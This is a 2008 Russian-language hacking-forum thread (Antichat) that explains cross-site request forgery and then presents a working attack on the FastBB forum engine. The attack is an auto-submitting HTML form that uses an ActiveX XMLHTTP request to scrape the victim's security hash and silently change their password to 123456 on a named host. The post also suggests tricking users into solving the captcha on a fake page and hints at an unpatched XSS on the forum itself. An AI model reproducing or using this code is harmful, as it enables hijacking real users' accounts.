Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Обход защиты от автоформ с помощью activeX (на примере CMS fastbb) (https://forum.antichat.xyz/showthread.php?t=65118)

ZET36 23.03.2008 07:47

Обход защиты от автоформ с помощью activeX (на примере CMS fastbb)
 
Как известно большинство крупных движков форумов защищаются от автоформ различными способами. в этой теме (так как на статью не тянет))) я преведу примеры одного из способов обхода защиты от таких автоформ но прежде обьяснью что такое автоформа

(описание что такое автоформ-уязвмости и способы защиты от них предоставлены для новичков в позновательно-ознакомитеьных целях так что судари не бранитесь ))
.................................................. .......................................
например есть профиль юзера где он может изменить любую нужную информацию в том числе емайл для востановления парля и изменение самого пароля итд. и собвстенно существует запрос для изменения этой инфы пусть примером будет www.site.ru/profile.php?user=zet&email=negr@mail.ru
тоесть отправив такой запрос юзер имея авторизоанные куки(кто сохраняет пароль) пройдя по нему изменит свою инфу
так что мешает заманить жертву нна такую страницу например с кодом
<img src=www.site.ru/profile.php?user=zet&email=negr@mail.ru>
тоесть жертва замент свой емайл для востановления пароля даже этого не заметив . в принципе эта уязвимость и называется автоформа

так вот существуют методы защиты от таких автоформ
приведу самые распостранённые примеры

1. капча (картина защиты) тость к запросу прибавляется переменная этой картинки
например
www.site.ru/profile.php?user=zet&email=negr@mail.ru&kapcha=g32 4gj42
тоесть если юзер вводит неправильный код с картинки то запрос отклоняется сервером и собственно сгенерировать эту переменную капчи довольно проблематично

2. это ввод действующего пароля для изменении информации тоесть к запросу добавляется переменная пароля . и незная его пароля мы эту автоформу не создадим

3. При заходе на свой профиль страница генерирует хэш юзера (который собственно с генерировать мы тоже не можем) тоесть к запросу добавляется переменная которая содержится только на страницы жертвы

.................................................. ...................................


так вот собственно сам метод
с помощью актив икс мы можем получить содержимое страницы и причом с куками жертвы так как запрос выполняется с клиента

Код:

<SCRIPT>

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("rnTRACE","http://yandex.ru/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();

alert(x.responseText);

</SCRIPT>

так вот собственно если выдрать с страницы жертвы эту переменную хэша (на фастбб сужествует защита именно п охэшу) и отправить автоформу на смену пароля то мы поменяем жертве пароль на свой если он зайдёт на эту страницу. ну и собственно сам скрипт на примере фастбб

Код HTML:

<SCRIPT>
function autoform () {
document.newuser.submit();
}
</SCRIPT>

<BODY onload='autoform()'>
<form name=newuser action=http://eeweqw.forum24.ru/ method=POST>

<SCRIPT>
document.write("<input tupe=text name=parol value=");

var x = new ActiveXObject("
Microsoft.XMLHTTP");
x.open("rnTRACE","http://eeweqw.forum24.ru/",false);
x.setRequestHeader("Max-Forwards","0");
x.send();

red=x.responseText.lastIndexOf("parol");
green=x.responseText.lastIndexOf("modraz");

for (var i = red+7; i < green-2; i++)
{
zet=x.responseText.charAt(i);
document.write(zet);

}

document.write(">
");

</SCRIPT>
<INPUT NAME='work' TYPE='hidden' value='32'>
<INPUT NAME='razdel' TYPE='hidden' value='zalupa'>
<INPUT NAME='newpass' TYPE='hidden' value='123456'>

немножко его обьяснь если непротив
http://eeweqw.forum24.ru - аткакуемый хост

parol и modraz - значения в странице кода с помощью которых находится эта переменная хэша (она находится между ними + там разные символы они в цикле отфильтрованы)

zalupa - имя пользователя в форуме. увидеть это имя можно просмотрев профиль юзера-жертвы например http://жертва.forum24.ru/?zalupa значит имя жертвы zalupa


ну и так жертва зашедшая на страницу с таким кодом меняет свой дейтсвующий пароль на 123456

Ps актуально только под осликом так как актив икс в других браузерах нету

.................................................. .................................
и ещё мысли по обходу защиты с каптчей. например выдираем src этой каптчи и выводим на страницу картинку с такимже src и дальше добавляем поля регестрации и заманиваем на неё с помощью метода зарегаешся бесплатно дам 7мизнак и темсамым регаясь на этом псевдосайте он вводит цифры с капчи для замены своего пароля и нажав кнопочку "Зарегит" отправляет запрос на смену своего пароля
.................................................. .........................................
а вот форму с вводом действещего пароля(как на форуме античата) я пока непредумал. но небеда пассивную хсс на форуме ещё не прикрыли ;)
(пс: привет ponchik это sibon)

несудите строго. если что не понятно могу разьяснить
если считаете что тема достоина статьи то можете переместить

~X3RiX~ 23.03.2008 07:57

не катит!

ZET36 23.03.2008 08:03

~X3RiX~ в смысле на статью? согласен)0 поэтому и поместил сюда
или в смысле не катит под фаст? напоминаю актуально только под осликом

ZET36 23.03.2008 11:15

а вообще в актив икс есть возможность доступа к реестру в следущей теме опубликую))

imajo.ati 25.03.2008 20:21

осталось посчитать у скольких юзеров этот актив икс включен =\
он по-моему для инет-приложений отключен по умолчанию начиная с XPsp2, не говоря уже про отдельные элементы актив икса по редактированию реестра или доступа к файловой системе - они просто не поддерживают удаленный доступ (или заблокированы). максимум что можно сделать - составить страницу с кодом, замаскированным под adobe active x и заставить открыть ее на локалхосте - да и то выплюнется предупреждение о наличии актив икс или предложат установить несуществующий элемент.
а про вывод капчи на левый сайт это идея хорошая =) +


Время: 19:43